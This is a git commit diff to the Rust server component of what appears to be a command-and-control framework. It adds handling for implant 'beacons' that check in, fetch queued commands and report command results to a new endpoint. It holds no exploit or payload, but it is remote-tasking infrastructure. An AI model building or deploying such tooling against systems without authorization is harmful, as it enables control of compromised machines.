feat: record results of beacon callbacks
This commit is contained in:
@@ -12,9 +12,11 @@ pub mod error;
|
||||
mod router;
|
||||
|
||||
#[derive(Clone)]
|
||||
#[non_exhaustive]
|
||||
pub enum BeaconEvent {
|
||||
NewBeacon(String),
|
||||
Checkin(String)
|
||||
Checkin(String),
|
||||
BeaconCommandFinished(String, i64)
|
||||
}
|
||||
|
||||
pub struct BeaconListenerHandle {
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
use std::net::SocketAddr;
|
||||
|
||||
use axum::{extract::{State, ConnectInfo}, routing::post, Router};
|
||||
use axum::{extract::{State, ConnectInfo, Path}, routing::post, Router};
|
||||
use axum_msgpack::MsgPack;
|
||||
use sqlx::SqlitePool;
|
||||
use tokio::sync::broadcast;
|
||||
@@ -15,7 +15,6 @@ pub struct ListenerState {
|
||||
event_publisher: broadcast::Sender<BeaconEvent>,
|
||||
}
|
||||
|
||||
#[axum::debug_handler]
|
||||
pub async fn handle_checkin(
|
||||
State(state): State<ListenerState>,
|
||||
ConnectInfo(addr): ConnectInfo<SocketAddr>,
|
||||
@@ -94,20 +93,6 @@ pub async fn handle_checkin(
|
||||
.fetch_optional(&state.db)
|
||||
.await?;
|
||||
|
||||
if let Some(category_id) = template_category.map(|r| r.default_category).flatten() {
|
||||
if let Err(e) = sqlx::query!(
|
||||
"INSERT INTO beacon_category_assignment (category_id, beacon_id)
|
||||
VALUES (?, ?)",
|
||||
category_id,
|
||||
reg.beacon_id
|
||||
)
|
||||
.execute(&state.db)
|
||||
.await {
|
||||
tracing::warn!("Could not assign beacon to default category: {e:?}");
|
||||
return Err(e.into());
|
||||
};
|
||||
}
|
||||
|
||||
sqlx::query!(
|
||||
r#"INSERT INTO beacon_instance
|
||||
(beacon_id, template_id, peer_ip, nickname, cwd, operating_system, beacon_userent, hostname)
|
||||
@@ -124,6 +109,20 @@ pub async fn handle_checkin(
|
||||
.execute(&state.db)
|
||||
.await?;
|
||||
|
||||
if let Some(category_id) = template_category.map(|r| r.default_category).flatten() {
|
||||
if let Err(e) = sqlx::query!(
|
||||
"INSERT INTO beacon_category_assignment (category_id, beacon_id)
|
||||
VALUES (?, ?)",
|
||||
category_id,
|
||||
reg.beacon_id
|
||||
)
|
||||
.execute(&state.db)
|
||||
.await {
|
||||
tracing::warn!("Could not assign beacon to default category: {e:?}");
|
||||
return Err(e.into());
|
||||
};
|
||||
}
|
||||
|
||||
let rec = sqlx::query_as!(
|
||||
DbBeaconConfig,
|
||||
r"SELECT c.mode, c.regular_interval, c.random_min_time, c.random_max_time, c.cron_schedule, c.cron_mode
|
||||
@@ -141,7 +140,6 @@ pub async fn handle_checkin(
|
||||
}
|
||||
};
|
||||
|
||||
tracing::debug!("Here 5");
|
||||
let now = chrono::Utc::now();
|
||||
sqlx::query!(
|
||||
r"INSERT INTO beacon_checkin (beacon_id, checkin_date) VALUES (?, ?)"r,
|
||||
@@ -154,23 +152,75 @@ pub async fn handle_checkin(
|
||||
let current_beacon_reg = current_beacon_reg
|
||||
.ok_or(error::Error::Generic("could not load configuration".to_string()))?;
|
||||
|
||||
let actions = sqlx::query!(
|
||||
"SELECT cmd.command_id, cmd.cmd_parameters FROM beacon_instance inst
|
||||
INNER JOIN beacon_command_invocation bci ON bci.beacon_id = inst.beacon_id
|
||||
INNER JOIN beacon_command cmd ON cmd.command_id = bci.command_id
|
||||
WHERE inst.beacon_id = ?
|
||||
AND bci.invocation_date IS NULL",
|
||||
reg.beacon_id
|
||||
)
|
||||
.fetch_all(&state.db)
|
||||
.await?;
|
||||
|
||||
let actions = actions
|
||||
.iter()
|
||||
.map(|rec| (
|
||||
rec.command_id,
|
||||
serde_json::from_str::<sparse_actions::actions::Actions>(&rec.cmd_parameters)
|
||||
))
|
||||
.filter_map(|(id, act)| {
|
||||
match act {
|
||||
Ok(v) => Some((id, v)),
|
||||
Err(e) => {
|
||||
tracing::warn!("Error pulling action from database: {e:?}");
|
||||
None
|
||||
}
|
||||
}
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
|
||||
Ok(MsgPack(messages::BeaconConfig {
|
||||
runtime_config: current_beacon_reg
|
||||
runtime_config: current_beacon_reg,
|
||||
unfinished_actions: actions
|
||||
}))
|
||||
}
|
||||
|
||||
pub async fn handle_command_result(
|
||||
State(state): State<ListenerState>,
|
||||
Path((beacon_id, command_id)): Path<(String, i64)>,
|
||||
MsgPack(cmd_res): MsgPack<messages::CommandInvocationResult>,
|
||||
) -> Result<(), error::Error> {
|
||||
let now = chrono::Utc::now();
|
||||
|
||||
sqlx::query!(
|
||||
"UPDATE beacon_command_invocation
|
||||
SET invocation_date = ?, invocation_result = ?
|
||||
WHERE beacon_id = ? AND command_id = ?",
|
||||
now,
|
||||
cmd_res.result_body,
|
||||
beacon_id,
|
||||
command_id
|
||||
)
|
||||
.execute(&state.db)
|
||||
.await?;
|
||||
|
||||
state.event_publisher.send(BeaconEvent::BeaconCommandFinished(beacon_id, command_id))?;
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub fn get_router(db: SqlitePool, event_publisher: broadcast::Sender<BeaconEvent>) -> Router<()> {
|
||||
Router::new()
|
||||
.route(
|
||||
"/checkin",
|
||||
post(handle_checkin),
|
||||
)
|
||||
.route("/files/download/:fileid", post(|| async {}))
|
||||
.route("/files/upload", post(|| async {}))
|
||||
.route(
|
||||
"/upload/:beaconid/:commandid",
|
||||
post(|| async {
|
||||
tracing::info!("Hello");
|
||||
"hi there"
|
||||
}),
|
||||
"/finish/:beaconid/:commandid",
|
||||
post(handle_command_result),
|
||||
)
|
||||
.with_state(ListenerState { db, event_publisher })
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user